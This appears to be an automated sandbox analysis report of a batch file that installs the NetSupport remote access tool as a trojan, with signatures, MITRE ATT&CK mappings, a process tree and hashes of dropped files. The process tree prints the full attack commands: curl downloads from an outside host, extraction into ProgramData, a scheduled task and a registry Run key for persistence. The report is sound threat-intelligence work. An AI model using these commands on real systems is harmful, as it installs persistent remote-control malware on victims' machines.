netsupport | 60dbaed2358a02ed2102cc2158c05fce9bba87674d68f1114198423bd8460a93

Analysis

max time kernel
142s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
13/07/2023, 22:39

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

1.bat
Size

9KB
MD5

4b2794840b114be5011da81ad4c462d8
SHA1

66cf9461efa6fb1e55af037515121d2a856670ac
SHA256

60dbaed2358a02ed2102cc2158c05fce9bba87674d68f1114198423bd8460a93
SHA512

28d60ca188d99af1e6338d97cbcde497f5325c1a7da132b7d8f9c29a630d93570b488db40bc3ded89fa96c04153298b6a15128f641fcb1134cfa8d933d9e8b2c
SSDEEP

192:JhSy/Ogy0+OPN3b9h5gIZpiuhHA9waK+FJYY9gUeYzUEo1UfUu:JhSy/Ogy0+OPN3b1gBuRAzKEJD6G

Score

10^/10

netsupport persistence rat

Malware Config

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
4692	7zz.exe
4320	client32.exe

Loads dropped DLL 5 IoCs

pid	Process
4320	client32.exe
4320	client32.exe
4320	client32.exe
4320	client32.exe
4320	client32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVYS = "C:\\ProgramData\\client32.exe"	reg.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
5068	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3776	timeout.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeSecurityPrivilege	4320	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4320	client32.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 3892 wrote to memory of 2456	3892	cmd.exe	86
PID 3892 wrote to memory of 2456	3892	cmd.exe	86
PID 2456 wrote to memory of 2964	2456	cmd.exe	87
PID 2456 wrote to memory of 2964	2456	cmd.exe	87
PID 3892 wrote to memory of 3008	3892	cmd.exe	90
PID 3892 wrote to memory of 3008	3892	cmd.exe	90
PID 3008 wrote to memory of 4340	3008	cmd.exe	91
PID 3008 wrote to memory of 4340	3008	cmd.exe	91
PID 3892 wrote to memory of 3200	3892	cmd.exe	94
PID 3892 wrote to memory of 3200	3892	cmd.exe	94
PID 3200 wrote to memory of 816	3200	cmd.exe	96
PID 3200 wrote to memory of 816	3200	cmd.exe	96
PID 3892 wrote to memory of 4268	3892	cmd.exe	98
PID 3892 wrote to memory of 4268	3892	cmd.exe	98
PID 4268 wrote to memory of 4592	4268	cmd.exe	99
PID 4268 wrote to memory of 4592	4268	cmd.exe	99
PID 4268 wrote to memory of 2384	4268	cmd.exe	100
PID 4268 wrote to memory of 2384	4268	cmd.exe	100
PID 4268 wrote to memory of 1948	4268	cmd.exe	101
PID 4268 wrote to memory of 1948	4268	cmd.exe	101
PID 4268 wrote to memory of 3776	4268	cmd.exe	102
PID 4268 wrote to memory of 3776	4268	cmd.exe	102
PID 1948 wrote to memory of 4692	1948	cmd.exe	103
PID 1948 wrote to memory of 4692	1948	cmd.exe	103
PID 1948 wrote to memory of 4692	1948	cmd.exe	103
PID 4268 wrote to memory of 5068	4268	cmd.exe	107
PID 4268 wrote to memory of 5068	4268	cmd.exe	107
PID 4268 wrote to memory of 1300	4268	cmd.exe	108
PID 4268 wrote to memory of 1300	4268	cmd.exe	108
PID 4268 wrote to memory of 2248	4268	cmd.exe	109
PID 4268 wrote to memory of 2248	4268	cmd.exe	109
PID 1300 wrote to memory of 4320	1300	cmd.exe	110
PID 1300 wrote to memory of 4320	1300	cmd.exe	110
PID 1300 wrote to memory of 4320	1300	cmd.exe	110
PID 4268 wrote to memory of 2576	4268	cmd.exe	111
PID 4268 wrote to memory of 2576	4268	cmd.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3892
- C:\Windows\system32\cmd.exe
  cmd.exe /c C:\ProgramData\sett.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\system32\curl.exe
    curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/tempy.7z" -o "C:\ProgramData\tempy.7z"
    3⤵
    PID:2964
- C:\Windows\system32\cmd.exe
  cmd.exe /c C:\ProgramData\7z.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3008
- - C:\Windows\system32\curl.exe
    curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"
    3⤵
    PID:4340
- C:\Windows\system32\cmd.exe
  cmd.exe /c C:\ProgramData\2.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3200
- - C:\Windows\system32\curl.exe
    curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat" -o "C:\ProgramData\2.bat"
    3⤵
    PID:816
- C:\Windows\system32\cmd.exe
  cmd.exe /c C:\ProgramData\2.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4268
- - C:\Windows\system32\xcopy.exe
    xcopy /h /y 7zz.exe C:\ProgramData\
    3⤵
    PID:4592
- - C:\Windows\system32\xcopy.exe
    xcopy /h /y tempy.7z C:\ProgramData\
    3⤵
    PID:2384
- - C:\Windows\system32\cmd.exe
    cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1948
  - - C:\ProgramData\7zz.exe
      C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\
      4⤵
      Executes dropped EXE
      PID:4692
- - C:\Windows\system32\timeout.exe
    TIMEOUT /T 3
    3⤵
    - Delays execution with timeout.exe
    PID:3776
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /create /F /tn "KAVYS" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 8 /sd 01/01/2022 /st 00:00
    3⤵
    - Creates scheduled task(s)
    PID:5068
- - C:\Windows\system32\cmd.exe
    cmd /c C:\ProgramData\client32.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1300
  - - C:\ProgramData\client32.exe
      C:\ProgramData\client32.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:4320
- - C:\Windows\system32\reg.exe
    reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    3⤵
    PID:2248
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "KAVYS" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\2.bat

Filesize
232B

MD5
6011bc3aa00cc9eefa63bd07c9676678

SHA1
9c8fb9c006ab9787254bd6ade3194a90c24d66c9

SHA256
5a8a48a2be136200954f5f81de68363d5dd8c82489dacae5d6b717b598634079

SHA512
93869d542de437ce4514c745153284163305256f4673139a91ce9253ea329941b1fc273ccb3c0a2710e761ad41698a3f96ea0a5516ab3f436a5ead82572d36ba

Download Submit
C:\ProgramData\2.bat

Filesize
5KB

MD5
9c8e256f5fda613cd6ce0889ecf601ef

SHA1
ccba6c491a278c82145fcac7426a9f5da5dc933f

SHA256
ef55ff724e649918691224e7c6d1fc7ff5a9d73dc38b0ae70ce117f9c20009eb

SHA512
d2f709c475f993e6c26c0444eb394ed1ee39fb261a0f77f5d5a8cb3ba36eb4a1f4fbfb45a6ce5bc0afaaae6dd0f16f02497a3c93f0f61267b9fc5d93e519f51e

Download Submit
C:\ProgramData\7z.bat

Filesize
239B

MD5
67404b0103100e3452532b69a46aa33f

SHA1
4bc62bfaecc1a4c5c95d906e2b64e161933f9965

SHA256
6f1624a63e0713b8c0f86a461e9ce955f0d7eef8d4d3cdacf0b79e3ae843f19c

SHA512
4c7f3e63746179413915f308dea04cf668f909a4111caa479b633587137483ff7af548e2aab7180617cc5a6363884151f546a58b0b40a7bdb7edc3024bb26989

Download Submit
C:\ProgramData\7zz.exe

Filesize
574KB

MD5
42badc1d2f03a8b1e4875740d3d49336

SHA1
cee178da1fb05f99af7a3547093122893bd1eb46

SHA256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA512
6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

Download Submit
C:\ProgramData\7zz.exe

Filesize
574KB

MD5
42badc1d2f03a8b1e4875740d3d49336

SHA1
cee178da1fb05f99af7a3547093122893bd1eb46

SHA256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA512
6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

Download Submit
C:\ProgramData\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\ProgramData\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\ProgramData\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\ProgramData\NSM.LIC

Filesize
258B

MD5
1b41e64c60ca9dfadeb063cd822ab089

SHA1
abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

SHA256
f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

SHA512
c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

Download Submit
C:\ProgramData\PCICHEK.DLL

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\ProgramData\PCICL32.DLL

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\ProgramData\PCICL32.dll

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\ProgramData\client32.exe

Filesize
99KB

MD5
f70b67c2b3204b7ddd8b755799cccff0

SHA1
a42e55e328d62d11e687c167bb7049d46f0f9b26

SHA256
213af995d4142854b81af3cf73dee7ffe9d8ad6e84fda6386029101dbf3df897

SHA512
54fcba8a063bfbaae4c3a39624bf3407db6af5699ab8686f936ab03c5864df7a44d089066fa2d4aedf5ad50d6b04624966a5111bf57bec1dda74a571f1dd7c63

Download Submit
C:\ProgramData\client32.exe

Filesize
99KB

MD5
f70b67c2b3204b7ddd8b755799cccff0

SHA1
a42e55e328d62d11e687c167bb7049d46f0f9b26

SHA256
213af995d4142854b81af3cf73dee7ffe9d8ad6e84fda6386029101dbf3df897

SHA512
54fcba8a063bfbaae4c3a39624bf3407db6af5699ab8686f936ab03c5864df7a44d089066fa2d4aedf5ad50d6b04624966a5111bf57bec1dda74a571f1dd7c63

Download Submit
C:\ProgramData\client32.ini

Filesize
713B

MD5
99c9a23ca6754f0cf146a095e9e666d3

SHA1
817ebba693f606c1cb8c5524360961b13642e6b9

SHA256
ae1399c7b00710cdd7c119bee4b42c107bfee79c399b27a497a19094150f53ad

SHA512
68970cf9ec3065860ae60a225014a71a1aac1311102605b7fb85c58fc76537a44169fac1fa9368e1aa82f564147626f46b194b89300e171d6fa740e57a5b3402

Download Submit
C:\ProgramData\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\ProgramData\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\ProgramData\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\ProgramData\pcichek.dll

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\ProgramData\sett.bat

Filesize
248B

MD5
7d1c3743cb7af1f479ef8a94c1dc44da

SHA1
228abfe62f4f166bb0881e273c2bd6bffb3167d4

SHA256
434d977609d8c580895a2b3b74f0948e2670bdeef5d06a1325c4940264b95f6c

SHA512
e00f310e0c09b0e78ee98e8c1efdbb2caf6cac0e5fde51536123443f54f271c0232b4521c02de5083eb18cc03d350d37a0cb1ed2da58c6a0830b5462def34276

Download Submit
C:\ProgramData\tempy.7z

Filesize
2.2MB

MD5
7bfc5ad1796a0bbaefcad64239543506

SHA1
bb1f0b198d9011b00164fad88523c35369eb9e4a

SHA256
42679bd369a3b772c43b9ba20bf8a31a2593a360cfa2de77aa6d2023f9a0c109

SHA512
90dfac808c2009439ebff3ef0fcfb95cb4fce1176b9c5d7587a6908e66687dc0f6592d29f71bf1c19a73f82522298625052791e9620beee285bebe613a00d091

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads